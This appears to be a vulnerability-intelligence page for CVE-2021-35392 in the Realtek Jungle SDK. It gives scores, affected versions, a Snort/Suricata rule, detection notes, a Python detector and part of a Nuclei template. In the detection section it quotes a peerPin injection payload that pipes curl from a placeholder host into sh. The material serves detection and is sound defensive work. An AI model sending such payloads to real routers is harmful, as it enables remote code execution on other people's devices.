CVE-2021-35392
Published 2021-08-16
Priority: P2 70 · high · CVSS 3.1: 7.5
Vector: AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
EXPLOIT
EPSS: 83.15% (99.6th percentile)
Realtek Jungle SDK version v2.x up to v3.4.14B provides a 'WiFi Simple Config' server that implements both UPnP and SSDP protocols. The binary is usually named wscd or mini_upnpd and is the successor to miniigd. The server is vulnerable to a heap buffer overflow caused by unsafe construction of SSDP NOTIFY messages from the ST header of received M-SEARCH messages.
Affected (1 range)
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| realtek | rtl819x_jungle_software_development_kit | 2.0 – 3.4.14b | — |
Detection & IOCs (extracted from sources)
- url: /goform/formWsc
- path: /goform/formWsc
- command: submit-url=%2Fwlwps.asp&resetUnCfg=0&peerPin=12345678;curl http://{{interactsh-url}} | sh;&setPIN=Start+PIN&configVxd=off&resetRptUnCfg=0&peerRptPin=
- snort:
alert http any any -> [$HOME_NET,$HTTP_SERVERS] any (msg:"ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)"; flow:established,to_server; http.method; content:"POST"; http.uri; content:"/goform/"; pcre:"/^form(RebootCheck|Wsc)$/R"; http.request_body; content:"submit-url="; fast_pattern; isdataat:2000,relative; reference:url,www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain/; reference:cve,2021-35392; classtype:attempted-user; sid:2033837; rev:1; metadata:attack_target Server, created_at 2021_08_30, cve CVE_2021_35392, deployment Perimeter, deployment Internal, confidence Medium, signature_severity Major, tag Exploit, updated_at 2023_04_05, mitre_tactic_id TA0001, mitre_tactic_name Initial_Access, mitre_technique_id T1190, mitre_technique_name Exploit_Public_Facing_Application;)
- Exploit targets the 'formWsc' page via HTTP POST to /goform/formWsc; injection occurs in the 'peerPin' parameter. Look for semicolons or shell metacharacters in the peerPin field.
- The Snort/ET rule triggers on HTTP POST to /goform/formRebootCheck or /goform/formWsc with a request body containing 'submit-url=' and a body length exceeding 2000 bytes (isdataat:2000,relative), indicating an oversized/malicious payload.
- The vulnerable binaries are named 'wscd' or 'mini_upnpd'. Monitor for these processes handling crafted SSDP NOTIFY/M-SEARCH messages on the network.
- The heap buffer overflow is triggered via crafted SSDP NOTIFY messages derived from received M-SEARCH ST headers. Monitor SSDP traffic for anomalously large or malformed ST header values.
- The Nuclei template uses an OOB interaction check: a successful exploit causes the target to issue an outbound HTTP request with 'User-Agent: curl', which can be detected on egress or via canary/interactsh infrastructure.
- Note: the Nuclei template is tagged CVE-2021-35395 (command injection) but is included in sources for CVE-2021-35392 (heap buffer overflow). The two CVEs are distinct vulnerabilities in the same SDK; ensure detections are applied to the correct CVE.
- Note: the ET Snort rule (sid:2033837) covers both formRebootCheck and formWsc endpoints under CVE-2021-35392, so it may fire on either endpoint; tune accordingly to avoid false positives from legitimate WPS configuration traffic.
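As an added example (not from the page's sources, the ET rule set or the Nuclei project), the detection conditions listed above expressed in Python and run over constructed sample requests; the host name, the `;echo x` peerPin value and the helper names are assumptions:

```python
import re
from urllib.parse import unquote_plus

# Conditions mirrored from ET rule sid:2033837 and the notes above:
# POST to /goform/formRebootCheck or /goform/formWsc, body containing
# "submit-url=" followed by at least 2000 bytes (isdataat:2000,relative),
# plus a check for shell metacharacters in peerPin (the CVE-2021-35395 sink).
GOFORM_RE = re.compile(r"^/goform/form(RebootCheck|Wsc)$")
SHELL_META = re.compile(r"[;|&`$]")
MARKER = b"submit-url="
ISDATAAT = 2000

def parse_request(raw: bytes):
    """Split a raw HTTP/1.1 request into (method, path, body)."""
    head, _, body = raw.partition(b"\r\n\r\n")
    method, path, _ = head.split(b"\r\n", 1)[0].decode("latin-1").split(" ", 2)
    return method, path, body

def form_fields(body: bytes) -> dict:
    """Decode an x-www-form-urlencoded body, splitting on '&' only (not ';')."""
    fields = {}
    for pair in body.decode("latin-1").split("&"):
        key, _, value = pair.partition("=")
        fields[unquote_plus(key)] = unquote_plus(value)
    return fields

def check_request(raw: bytes) -> list:
    """Return detection findings for one request; an empty list means no match."""
    method, path, body = parse_request(raw)
    if method != "POST" or not GOFORM_RE.match(path):
        return []
    findings = []
    idx = body.find(MARKER)
    if idx != -1 and len(body) - (idx + len(MARKER)) >= ISDATAAT:
        findings.append("oversized body after submit-url= (sid:2033837)")
    if SHELL_META.search(form_fields(body).get("peerPin", "")):
        findings.append("shell metacharacter in peerPin")
    return findings

# Constructed sample requests (not captured traffic); host name is made up.
def build(method: str, path: str, body: bytes) -> bytes:
    return (f"{method} {path} HTTP/1.1\r\nHost: router.example\r\n"
            f"Content-Length: {len(body)}\r\n\r\n").encode() + body

BENIGN = build("POST", "/goform/formWsc", b"submit-url=%2Fwlwps.asp&peerPin=12345678&setPIN=Start+PIN")
INJECT = build("POST", "/goform/formWsc", b"submit-url=%2Fwlwps.asp&peerPin=12345678;echo+x&setPIN=Start+PIN")
OVERSIZE = build("POST", "/goform/formRebootCheck", b"submit-url=" + b"A" * 2100)
NOT_POST = build("GET", "/goform/formWsc", b"")
```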
CVSS provenance
- NVD v3.1: 7.5 HIGH, CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:N/I:N/A:H
- NVD v2.0: 7.8 HIGH, AV:N/AC:L/Au:N/C:N/I:N/A:C
Suricata
ET EXPLOIT Possible Realtek SDK - formRebootCheck/formWsc Stack Buffer Overflow Inbound (CVE-2021-35392)
suricata · 2021-08-30 · CVSS 7.5 · CVE-2021-35392 [HIGH]
Rule: sid:2033837, identical to the snort rule listed under Detection & IOCs above.
Nuclei
RealTek Jungle SDK - Arbitrary Command Injection
nuclei · CVSS 7.5 · CVE-2021-35395 [HIGH]
There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
Template:
id: CVE-2021-35395
info:
  name: RealTek Jungle SDK - Arbitrary Command Injection
  author: king-alexander
  severity: critical
  description: |
    There is a command injection vulnerability on the "formWsc" page of the management interface. Successful exploitation of this vulnerability could lead to remote code execution and compromise of the affected system.
  impact: |
    Unauthenticated attackers can execute arbitrary system commands via command injection in the peerPin parameter, leading to complete router compromise and contro
No writeups or analysis indexed.
- https://www.iot-inspector.com/blog/advisory-multiple-issues-realtek-sdk-iot-supply-chain
- https://www.realtek.com/en/cu-1-en/cu-1-taiwan-en
- https://www.realtek.com/images/safe-report/Realtek_APRouter_SDK_Advisory-CVE-2021-35392_35395.pdf